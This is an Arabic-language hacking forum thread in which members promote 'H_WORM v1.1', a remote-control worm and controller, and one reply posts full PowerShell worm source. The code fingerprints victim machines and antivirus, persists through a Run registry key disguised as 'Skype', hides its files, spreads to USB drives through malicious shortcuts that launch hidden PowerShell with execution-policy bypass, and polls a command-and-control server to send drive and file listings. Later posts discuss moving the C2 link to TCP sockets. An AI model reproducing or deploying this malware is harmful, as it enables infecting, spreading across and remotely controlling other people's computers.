H_WORM v 1.1

تم تحميل الصفحة في 0,4511775 ثانية
H_WORM v 1.1

NewBinary

Active DeveloPer
rankrank
إنضم
17 نوفمبر 2017
المشاركات
360
الإعجابات
324
النقاط
63


تطويرا لمتحكم الاسطورة هوديني والدودة الخاصة به

تم اضافة اشياء جديدة الى المتحكم والدودة منها تشفير الباسوورد وتشفير الهوست والبورت

شرح بسيط للبرنامج

عند انشاء الدودة يتم حفظ الباسوورد مشفر بمسار البرنامج ويكون مشفر . الباسورد هام جدا للاتصال بالضحايا اذا تم حذفه او نسيانه فودع الضحايا

يجب ان يكون رابط الهوست والبورت مرفوع على رابط مباشر يكون قابل للتغيير افضل اذا تم حظر الهوست قم بانشاء هوست جديد وغيره فقط مع الحفاظ على الرابط المباشر كما هو

يحفظ الهوست والبورت على هذا الشكل

يكون على هذا الشكل


1177 : 127.0.0.1

تستطيع التعديل على الدودة اذا اردت تشفير اضافي بحيث يكون الهوست والبورت المرفوعين على رابط مباشر مشفر ثم فك التشفير في الدودة اذا تبدو صعبة ممكن ادمج الخاصية في النسخة القادمة اذا كان هناك طلب .










التحميل

EM

محبكم

Eagle Master
 

istrm

Beginner Developer
rank
إنضم
19 أبريل 2019
المشاركات
4
الإعجابات
5
النقاط
3
العمر
29
الإقامة
No Information
السلام عليكم
عمل جميل و حلو و اضافه جميله من ناحية التشفير اظن سوف يصبح تشفير الدوده الان اسهل في هذا الاصدار
و سوف يكون هنالك افكار جديده و طرق جديده
بارك الله فيك .
 
إنضم
1 نوفمبر 2012
المشاركات
2,698
الإعجابات
3,522
النقاط
113
الإقامة
المغرب وكل البلاد اوطاني
بارك الله بك اخي الكريم ومزيدا من التالق ان شاء الله
برمجية جميلة
لدي اقتراح لك مارايك ان تجعلها تعمل مع دودة البور شيل و الفبي سكريبت
مقتطف من سورس البور شيل

كود:
#=============================================================
#=== Original programming programmer :  v_B01   ==============
#=== Development of original programming : Mr3 ===============
#=============================================================

#var
$spl = '<|>';
$vn = 'Guest';
$port = 808
$host = "127.0.0.1"
$linkfile = $true
$lnkfolder= $true
#Get name of current script
$ScriptName = $MyInvocation.MyCommand.Name
$fullPathIncFileName = $MyInvocation.MyCommand.Definition
#=============================================================
# object com
$WshShell = New-Object -comObject WScript.Shell
$Shell = New-Object -comObject Shell.Application
$Fs = New-Object -comObject Scripting.FileSystemObject
#=============================================================
function runscr($dir){
    $newline = [Environment]::NewLine
    $vbscriptload = 'Set objShell = WScript.CreateObject("WScript.Shell")' +
    $newline + 'objShell.Run "powershell -noprofile -executionpolicy bypass -Command .\" + "' + $ScriptName + '" ,0,false'
    $vbscriptload | Set-Content $dir
}

#=============================================================
# Function get information
function info {

    $mch = [environment]::Machinename
    $usr = [environment]::username
    $SerialNumber = $Fs.GetDrive("c:\").SerialNumber
    $SerialNumber = "{0:X}" -f $SerialNumber
    $HWD = $SerialNumber
    
    $wi = (Get-WmiObject Win32_OperatingSystem).Caption
    $wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture
    $wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');
    $av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;
    $nanav =""
    if ($av -eq $null)
    {$av = 'nan-av'}
    $e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';
    if (test-path $e)
    {$nt = '.Net YES'}
    else
    {$nt= '.Net NO'};
     if (test-path 'HKCU:\vdw0rm')
     {$usb = 'TRUE'} else { $usb = 'FALSE'};
     $u = $vn + '_' + $HWD+ $spl + $mch + $spl + $usr + $spl + $wi + $spl + $nt + $spl + $av + $spl + $usb + $spl;
     return $u
    
 }
#=============================================================
# Function Kills CURRENT instance if this script already running.
Function CURRENT-instance {
    
        [CmdletBinding()]
        Param (
            [Parameter(Mandatory=$true)]
            [ValidateNotNullorEmpty()]
            [String]$ScriptName
        )
        
        $PsScriptsRunning = get-wmiobject win32_process | where{$_.processname -eq 'powershell.exe'} | select-object commandline,ProcessId

        ForEach ($PsCmdLine in $PsScriptsRunning){
            [Int32]$OtherPID = $PsCmdLine.ProcessId
            [String]$OtherCmdLine = $PsCmdLine.commandline
            #Are other instances of this script already running?
            If (($OtherCmdLine -match $ScriptName) -And ($OtherPID -ne $PID) ){
          
                Exit
            }
        }
 }
#=============================================================   
# Function install
function install($dir) {
#$tmp = $env:APPDATA + "\" + $dir
 $tmp = $env:temp + "\" + $dir
 $ply = $env:temp + "\run.vbs"
   if ($fullPathIncFileName -ne $tmp) #  test-path $tmp
   {
      #Kills CURRENT instance if this script already running.
   # }else{
    
    
    Copy-Item $fullPathIncFileName -destination $tmp
    $Fhs.getfile($ply).attributes=2+4
    $Fhs.getfile($tmp).attributes=2+4
   # runscr($ply)
    $WshShell.regwrite("HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" + "Skype", 'wscript.exe //B ' + '"' + $ply + '"' , "REG_SZ")
   # CURRENT-instance -ScriptName $ScriptName
    cmd /c $ply
   # exit
    
    }
  
}
 
 

#=============================================================
# Function Spread -shortcut-usb
function Spread-usb {
$Fhs = New-Object -comObject Scripting.FileSystemObject
foreach ($driv in $Fhs.drives ){
    if ($driv.isready -eq  $true  ){
        if ($driv.drivetype -eq 1  ){
        
           $drv= $driv.path + "\" + $ScriptName
           Copy-Item $fullPathIncFileName -destination $drv
          
           if (test-path $drv)
            {
             $Fhs.getfile($drv).attributes=2+4
            
            }
    foreach ($file in $Fhs.getfolder($driv.path + "\" ).Files ){
             if (-not $linkfile){break}
             $fi = $file.name
             $ff =$fi.split(".")
             if ($fi.contains(".") )
             {
              if ($ff[1] -ne "lnk")
                 {
                    $file.attributes = 2+4
                    if ($fi -ne $ScriptName )
                    {
                    $fileicon = $WshShell.regread("HKEY_LOCAL_MACHINE\software\classes\" + $WshShell.regread("HKEY_LOCAL_MACHINE\software\classes\." + $ff[1] +"\") + "\defaulticon\")
                    # create a new shortcut
                    $ShellLink                  = $WshShell.CreateShortcut($driv.path + "\" + $ff[0] + ".lnk")
                    $ShellLink.TargetPath       = 'cmd.exe'
                    $ShellLink.WindowStyle      = 7
                    
                    $ShellLink.workingdirectory = ""     
                    $ShellLink.arguments         = "/c start powershell -ExecutionPolicy Bypass -windowstyle hidden -Command .\" + $ScriptName + " &start " + $file.name + " &exit"
                    if($fileicon.contains(",") -eq  $false ){
                    $ShellLink.IconLocation     = $file.path
                    }else{
                    $ShellLink.IconLocation     = $fileicon
                    }
                    
                    #Save the link
                    $ShellLink.Save()
                    }
                 }
             }
            
     }
    foreach ($folder in $Fhs.getfolder($driv.path + "\" ).subfolders ){
                if (-not $lnkfolder){break}
                $folder.attributes = 2+4
                $foldername = $folder.name
                $foldericon = $WshShell.regread("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
                    $ShellLink                  = $WshShell.CreateShortcut($driv.path + "\" + $foldername + ".lnk")
                    $ShellLink.TargetPath       = 'cmd.exe'
                    $ShellLink.WindowStyle      = 7
                    
                    $ShellLink.workingdirectory = ""     
                    $ShellLink.arguments         = "/c start powershell -ExecutionPolicy Bypass -windowstyle hidden -Command .\" + $ScriptName + " &start explorer " + $folder.name + " &exit"
                  
                    $ShellLink.IconLocation     = $env:windir + "\system32\shell32.dll,3"
                    
                    
                    #Save the link
                    $ShellLink.Save()
            

          }               
      }           
    }
}

}
#============================ functions controler =================================
Function enumdriver{
 $fso = New-Object -Com "Scripting.FileSystemObject"
    foreach ($driv in $fso.drives ){
     if ($driv.isready -eq  $true  ){
        $drv = $drv + $driv.path + "|" + $driv.drivetype + $spl
     }
    
     }
return $drv
}
#=============================================================
Function enumfaf($dir) {
$fso = New-Object -Com "Scripting.FileSystemObject"
$fil = $dir + $spl
foreach ($folder in $fso.getfolder($dir).subfolders){
     $fil = $fil + $folder.name + "|" + "" + "|" + "d" + "|" + $folder.attributes + $spl
}

foreach ($file in $fso.getfolder($dir).files){
     $fil = $fil + $file.name + "|" + $file.size  + "|" + "f" + "|" + $file.attributes + $spl

}
return $fil
}
#=============================================================
Function enumprocess{
return $proces
}
#=============================================================
Function exitprocess($pid) {

}
#=============================================================
# Function get and send data
$inf=info
function post($C,$A){

    $http = New-Object -comObject MsXml2.XMLHTTP
    $http.open('POST','http://127.0.0.1:808/' + $C,$false)
    $http.SetRequestHeader("user-agent:",$inf)
    $http.send($A)
return $http.responsetext

}
#============================ Main Script =================================
# Function Main {
    
   #Kills CURRENT instance if this script already running.
     CURRENT-instance -ScriptName $ScriptName
    install($ScriptName)
    
   Start-Sleep -s 3
$infinite =$true;
while($infinite) {

    $P = post('is-ready','')
    $T = $P.split($spl)
     if ($T[0] -eq 'uninstall') {
      exit
      }
     if ($T[0] -eq 'site-send') {
      exit
      }
     if ($T[0] -eq 'send') {
      exit
      }
     if ($T[0] -eq 'enum-driver') {
        $drv = enumdriver
      $h = post('is-enum-driver',$drv)
      $drv = ""
      
      }
     if ($T[0] -eq 'enum-faf') {
       $faf = enumfaf($T[1])
       $h = post('is-enum-faf',$faf)
       $faf = ""
      }
      if ($T[0] -eq 'enum-process') {
      
      }   
      
   # Spread-usb
    Start-Sleep -s 5

}
 
إنضم
1 نوفمبر 2012
المشاركات
2,698
الإعجابات
3,522
النقاط
113
الإقامة
المغرب وكل البلاد اوطاني
تمت اضافته يدويا كنت اعمل عليه في احد الفترات السابقة ليعمل مع متحكم دودة هوديني تم الاتصال وعرض البيانات بقي مشكل ارسال الاوامر من المتحكم الى الدودة لا يستجيب ثم تركت المشروع حينها كنت لا املك سورس للمتحكم والان سورس الدودة بين يديك به عدة اخطاء ومشاكل حاول اصلاحها وان شاء الله يكون خير
وبالتوفيق لك
 

NewBinary

Active DeveloPer
rankrank
إنضم
17 نوفمبر 2017
المشاركات
360
الإعجابات
324
النقاط
63
تمت اضافته يدويا كنت اعمل عليه في احد الفترات السابقة ليعمل مع متحكم دودة هوديني تم الاتصال وعرض البيانات بقي مشكل ارسال الاوامر من المتحكم الى الدودة لا يستجيب ثم تركت المشروع حينها كنت لا املك سورس للمتحكم والان سورس الدودة بين يديك به عدة اخطاء ومشاكل حاول اصلاحها وان شاء الله يكون خير
وبالتوفيق لك
راح اشوف معها ان شاء الله اذا لديك خبرة في الباورشال وما تاخذ من وقتك ممكن ارسلك stub.vbs تحوله لاستخدامه
 
إنضم
1 نوفمبر 2012
المشاركات
2,698
الإعجابات
3,522
النقاط
113
الإقامة
المغرب وكل البلاد اوطاني
والله يا اخي الكريم لم يعد لدي الوقت والصبر الكافي لهذه المسائل العمل ياخذ كل الوقت والجهد وبالنسبة للخبرة بالبور شيل فهي خبرة بسيطة فقط و لست ملم به جيدا
وهذه الاكواد كانت لا تزال موجودة عندي على احد اقراص اليو اسبي فرايت موضوعك فاحببت ان اشركك اياها
واذا اردت ان ترسل الملف ارسله ولاكن بدون ضمانة تنفيذه
بالتوفيق لك اخي الكريم
 

NewBinary

Active DeveloPer
rankrank
إنضم
17 نوفمبر 2017
المشاركات
360
الإعجابات
324
النقاط
63
والله يا اخي الكريم لم يعد لدي الوقت والصبر الكافي لهذه المسائل العمل ياخذ كل الوقت والجهد وبالنسبة للخبرة بالبور شيل فهي خبرة بسيطة فقط و لست ملم به جيدا
وهذه الاكواد كانت لا تزال موجودة عندي على احد اقراص اليو اسبي فرايت موضوعك فاحببت ان اشركك اياها
واذا اردت ان ترسل الملف ارسله ولاكن بدون ضمانة تنفيذه
بالتوفيق لك اخي الكريم
طيب اخي يبدو ان الباورشال سهل الفهم ممكن اقوم بتحويله بنفسي بارك الله فيك
 

NewBinary

Active DeveloPer
rankrank
إنضم
17 نوفمبر 2017
المشاركات
360
الإعجابات
324
النقاط
63
هل جربته على الدودة الاصلية لانه يبدو به اخطاء لم يعمل معي
 
إنضم
14 نوفمبر 2017
المشاركات
698
الإعجابات
790
النقاط
113
بارك الله فيك تطوير مميز ونسخة رائعة سيتفيد منها الاعضاء المهتمين بالديدان

:42:
 
إنضم
14 نوفمبر 2017
المشاركات
698
الإعجابات
790
النقاط
113
لا أعلم أي معلومة عن طريقة عمل الديدان vbs ولم أقم بفتح أو قرآءة أي سورس لها.. ولكن أعتقد هي تستخدم TCP بناءاً على المثيد التي ذكرها الأخ mr3

$http = New-Object -comObject MsXml2.XMLHTTP
$http.open('POST','http://127.0.0.1:808/' + $C,$false)
فبتالي.. كلاس السوكت أفضل وأثبت وهذا ماكنت افكر فيه من أيام كإضافة لدودة نيان
وأيضاً ممكن عمل post و get من خلال السوكت لو كان السيرفر يعمل بهذا الشكل.. لم أجرب ولكن نظرياً الفكرة صحيحة

${SK} = new-object System.Net.Sockets.TcpClient(ip,port)
لو كان فهمي خاطئ للدودة فصححوني لأني مبتدأ وممكن أبدأ بالعملي خلال أيام.
 
إنضم
7 مارس 2018
المشاركات
149
الإعجابات
110
النقاط
43
في الحقيقة رائع ماذا يمكن ان يعمل عن طريق vb.net
لكن عيبها الوحيد هو انها تحتاج الى .net على الجهاز
بدونه لايمكن الاختراق
-----
امامي طريق طويل في البرمجة
برمجة الويب
و python و ruby
 
إنضم
14 نوفمبر 2017
المشاركات
698
الإعجابات
790
النقاط
113
tcp بروتوكول اتصال networking

socket عبارة عن نقطة اتصال ip + بورت لأي بروتوكول اتصال tcp or udp
http عبارة عن طبقة برمجية تستخدم بروتوكول tcp في عملية الاتصال

تستطيع ارسال post بإستخدام socket أو http

ولكن حتى الآن لم أفهم سبب استخدام http في الارسال رغم أن كلاس socket أفضل بسبب وجود خيارات كثيرة فيه.
 

H O U D I N I

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
14 أغسطس 2010
المشاركات
5,255
الإعجابات
8,261
النقاط
113
الإقامة
الجزائر
tcp بروتوكول اتصال networking

socket عبارة عن نقطة اتصال ip + بورت لأي بروتوكول اتصال tcp or udp
http عبارة عن طبقة برمجية تستخدم بروتوكول tcp في عملية الاتصال

تستطيع ارسال post بإستخدام socket أو http

ولكن حتى الآن لم أفهم سبب استخدام http في الارسال رغم أن كلاس socket أفضل بسبب وجود خيارات كثيرة فيه.
الدوده مبرمجه ب vbs
ال vbs لايملك tcp ، فقط http
في حاله poweshell يملك كل شي , لايوجد ما يمنعك
فقط تحتاج خبره في تعامل مع tcp لانه ليس بسيط كل http
 

H O U D I N I

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
14 أغسطس 2010
المشاركات
5,255
الإعجابات
8,261
النقاط
113
الإقامة
الجزائر
كما قلت لك كنت اعمل عليه مع منحكم دودة هوديني وكان يحصل الاتصال ويعرض البينات المشكلة فقط عند ارسال الاوامر من المتحكم لا يتم تنفيذها
ساقوم بمراجعته و تصحيحه
 
إنضم
14 نوفمبر 2017
المشاركات
698
الإعجابات
790
النقاط
113
الدوده مبرمجه ب vbs
ال vbs لايملك tcp ، فقط http
في حاله poweshell يملك كل شي , لايوجد ما يمنعك
فقط تحتاج خبره في تعامل مع tcp لانه ليس بسيط كل http
كنت اتكلم عن الكلاس الذي ارفقه الأخ mr3 في الموضوع

وسؤالي له لماذا يستخدم http بدلا من السوكت tcp في الباورشيل لان ممكن لديه معلومه لا اعرفها.
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (2 عضو و 1 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل